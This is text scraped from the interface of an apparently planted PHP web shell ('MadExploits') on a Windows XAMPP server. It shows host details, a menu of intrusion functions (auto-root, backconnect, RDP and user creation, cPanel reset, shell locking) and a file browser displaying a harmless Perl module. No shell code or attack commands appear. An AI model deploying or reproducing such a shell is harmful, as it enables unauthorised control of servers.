Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Math /
[ HOME SHELL ]
Name
Size
Permission
Action
Base
[ DIR ]
drwxrwxrwx
BigInt
[ DIR ]
drwxrwxrwx
Int64
[ DIR ]
drwxrwxrwx
MPFR
[ DIR ]
drwxrwxrwx
Prime
[ DIR ]
drwxrwxrwx
Random
[ DIR ]
drwxrwxrwx
GMP.pm
16.76
KB
-rw-rw-rw-
Int64.pm
15.65
KB
-rw-rw-rw-
MPC.pm
16.01
KB
-rw-rw-rw-
MPC.pod
37
KB
-rw-rw-rw-
MPFR.pm
32.85
KB
-rw-rw-rw-
MPFR.pod
112.13
KB
-rw-rw-rw-
Round.pm
9.77
KB
-rw-rw-rw-
UInt64.pm
479
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UInt64.pm
package Math::UInt64; use strict; use warnings; use Math::Int64; sub import { goto &Math::Int64::import } 1; # ABSTRACT: Manipulate 64 bit unsigned integers from Perl __END__ =encoding UTF-8 =head1 NAME Math::UInt64 - Manipulate 64 bit unsigned integers from Perl =head1 DESCRIPTION Math::UInt64 is just an alias for Math::Int64, the only reason it exists as an independent package is to allow L<Storable> to load it on demand. =head1 SEE ALSO L<Math::Int64>. =cut
Close